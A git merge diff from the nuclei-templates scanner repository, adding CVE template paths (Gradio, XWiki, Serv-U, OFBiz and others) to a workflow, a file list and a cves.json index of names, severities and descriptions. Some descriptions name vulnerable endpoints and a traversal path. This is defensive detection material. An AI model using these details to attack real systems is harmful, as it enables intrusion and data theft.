Merge branch 'k8s-templates' of https://github.com/projectdiscovery/nuclei-templates into k8s-templates

.github/workflows/templates-sync.yml

@@ -4,21 +4,36 @@ on:
     paths:
     - '.new-additions'
     - 'cloud/aws/sns/sns-public-subscribe-access.yaml'
+    - 'dast/vulnerabilities/sqli/time-based-sqli.yaml'
     - 'http/cves/2021/CVE-2021-38146.yaml'
     - 'http/cves/2021/CVE-2021-38147.yaml'
+    - 'http/cves/2021/CVE-2021-43831.yaml'
+    - 'http/cves/2023/CVE-2023-32068.yaml'
     - 'http/cves/2023/CVE-2023-38194.yaml'
     - 'http/cves/2023/CVE-2023-43472.yaml'
+    - 'http/cves/2023/CVE-2023-51449.yaml'
     - 'http/cves/2023/CVE-2023-6505.yaml'
     - 'http/cves/2023/CVE-2023-6786.yaml'
     - 'http/cves/2024/CVE-2024-0250.yaml'
+    - 'http/cves/2024/CVE-2024-1728.yaml'
     - 'http/cves/2024/CVE-2024-23692.yaml'
+    - 'http/cves/2024/CVE-2024-2621.yaml'
+    - 'http/cves/2024/CVE-2024-28995.yaml'
+    - 'http/cves/2024/CVE-2024-31750.yaml'
+    - 'http/cves/2024/CVE-2024-32113.yaml'
+    - 'http/cves/2024/CVE-2024-3274.yaml'
+    - 'http/cves/2024/CVE-2024-36837.yaml'
     - 'http/cves/2024/CVE-2024-37393.yaml'
     - 'http/exposed-panels/lorex-panel.yaml'
     - 'http/exposed-panels/oracle-application-server-panel.yaml'
+    - 'http/exposed-panels/turnkey-lamp-panel.yaml'
     - 'http/exposed-panels/veeam-backup-manager-login.yaml'
     - 'http/exposed-panels/wildix-collaboration-panel.yaml'
     - 'http/misconfiguration/apache/apache-server-status-localhost.yaml'
+    - 'http/misconfiguration/cookies-without-secure.yaml'
     - 'http/technologies/nperf-server-detect.yaml'
+    - 'http/vulnerabilities/gradio/gradio-lfi.yaml'
+    - 'http/vulnerabilities/gradio/gradio-ssrf.yaml'
     - 'network/detection/mikrotik-ssh-detect.yaml'
   workflow_dispatch:
 jobs:

.new-additions

@@ -1,17 +1,32 @@
 cloud/aws/sns/sns-public-subscribe-access.yaml
+dast/vulnerabilities/sqli/time-based-sqli.yaml
 http/cves/2021/CVE-2021-38146.yaml
 http/cves/2021/CVE-2021-38147.yaml
+http/cves/2021/CVE-2021-43831.yaml
+http/cves/2023/CVE-2023-32068.yaml
 http/cves/2023/CVE-2023-38194.yaml
 http/cves/2023/CVE-2023-43472.yaml
+http/cves/2023/CVE-2023-51449.yaml
 http/cves/2023/CVE-2023-6505.yaml
 http/cves/2023/CVE-2023-6786.yaml
 http/cves/2024/CVE-2024-0250.yaml
+http/cves/2024/CVE-2024-1728.yaml
 http/cves/2024/CVE-2024-23692.yaml
+http/cves/2024/CVE-2024-2621.yaml
+http/cves/2024/CVE-2024-28995.yaml
+http/cves/2024/CVE-2024-31750.yaml
+http/cves/2024/CVE-2024-32113.yaml
+http/cves/2024/CVE-2024-3274.yaml
+http/cves/2024/CVE-2024-36837.yaml
 http/cves/2024/CVE-2024-37393.yaml
 http/exposed-panels/lorex-panel.yaml
 http/exposed-panels/oracle-application-server-panel.yaml
+http/exposed-panels/turnkey-lamp-panel.yaml
 http/exposed-panels/veeam-backup-manager-login.yaml
 http/exposed-panels/wildix-collaboration-panel.yaml
 http/misconfiguration/apache/apache-server-status-localhost.yaml
+http/misconfiguration/cookies-without-secure.yaml
 http/technologies/nperf-server-detect.yaml
+http/vulnerabilities/gradio/gradio-lfi.yaml
+http/vulnerabilities/gradio/gradio-ssrf.yaml
 network/detection/mikrotik-ssh-detect.yaml

cves.json

@@ -669,7 +669,6 @@
 {"ID":"CVE-2019-12581","Info":{"Name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12581.yaml"}
 {"ID":"CVE-2019-12583","Info":{"Name":"Zyxel ZyWall UAG/USG - Account Creation Access","Severity":"critical","Description":"Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the \"Free Time\" component. This can lead to unauthorized network access or DoS attacks.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2019/CVE-2019-12583.yaml"}
 {"ID":"CVE-2019-12593","Info":{"Name":"IceWarp Mail Server \u003c=10.4.4 - Local File Inclusion","Severity":"high","Description":"IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12593.yaml"}
-{"ID":"CVE-2019-12616","Info":{"Name":"phpMyAdmin \u003c4.9.0 - Cross-Site Request Forgery","Severity":"medium","Description":"phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken \u003cimg\u003e tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-12616.yaml"}
 {"ID":"CVE-2019-12725","Info":{"Name":"Zeroshell 3.9.0 - Remote Command Execution","Severity":"critical","Description":"Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12725.yaml"}
 {"ID":"CVE-2019-12962","Info":{"Name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","Severity":"medium","Description":"LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12962.yaml"}
 {"ID":"CVE-2019-12985","Info":{"Name":"Citrix SD-WAN Center - Remote Command Injection","Severity":"critical","Description":"Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12985.yaml"}
@@ -1467,6 +1466,7 @@
 {"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43778.yaml"}
 {"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x - Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43798.yaml"}
 {"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43810.yaml"}
+{"ID":"CVE-2021-43831","Info":{"Name":"Gradio \u003c 2.5.0 - Arbitrary File Read","Severity":"high","Description":"Files on the host computer can be accessed from the Gradio interface\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-43831.yaml"}
 {"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44077.yaml"}
 {"ID":"CVE-2021-44138","Info":{"Name":"Caucho Resin \u003e=4.0.52 \u003c=4.0.56 - Directory traversal","Severity":"high","Description":"There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44138.yaml"}
 {"ID":"CVE-2021-44139","Info":{"Name":"Alibaba Sentinel - Server-side request forgery (SSRF)","Severity":"high","Description":"There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44139.yaml"}
@@ -2142,6 +2142,7 @@
 {"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"}
 {"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
 {"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
+{"ID":"CVE-2023-32068","Info":{"Name":"XWiki - Open Redirect","Severity":"medium","Description":"XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-32068.yaml"}
 {"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"}
 {"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
 {"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
@@ -2156,7 +2157,6 @@
 {"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
 {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
 {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
-{"ID":"CVE-2023-33584","Info":{"Name":"Enrollment System Project v1.0 - SQL Injection Authentication Bypass","Severity":"critical","Description":"Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33584.yaml"}
 {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
 {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
 {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
@@ -2319,6 +2319,7 @@
 {"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
 {"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"}
 {"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"}
+{"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"}
 {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
 {"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"}
 {"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
@@ -2375,6 +2376,7 @@
 {"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"}
 {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
 {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
+{"ID":"CVE-2024-1728","Info":{"Name":"Gradio \u003e 4.19.1 UploadButton - Path Traversal","Severity":"high","Description":"gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1728.yaml"}
 {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"}
 {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
 {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
@@ -2395,6 +2397,7 @@
 {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
 {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
 {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
+{"ID":"CVE-2024-2621","Info":{"Name":"Fujian Kelixin Communication - Command Injection","Severity":"medium","Description":"A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-2621.yaml"}
 {"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"}
 {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
 {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
@@ -2407,15 +2410,18 @@
 {"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
 {"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"}
 {"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
+{"ID":"CVE-2024-28995","Info":{"Name":"SolarWinds Serv-U - Directory Traversal","Severity":"high","Description":"SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-28995.yaml"}
 {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
 {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH  - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
 {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"}
 {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where  images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
 {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
+{"ID":"CVE-2024-31750","Info":{"Name":"F-logic DataCube3 - SQL Injection","Severity":"high","Description":"SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31750.yaml"}
 {"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"}
 {"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
 {"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"}
 {"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"}
+{"ID":"CVE-2024-32113","Info":{"Name":"Apache OFBiz Directory Traversal - Remote Code Execution","Severity":"high","Description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32113.yaml"}
 {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
 {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"}
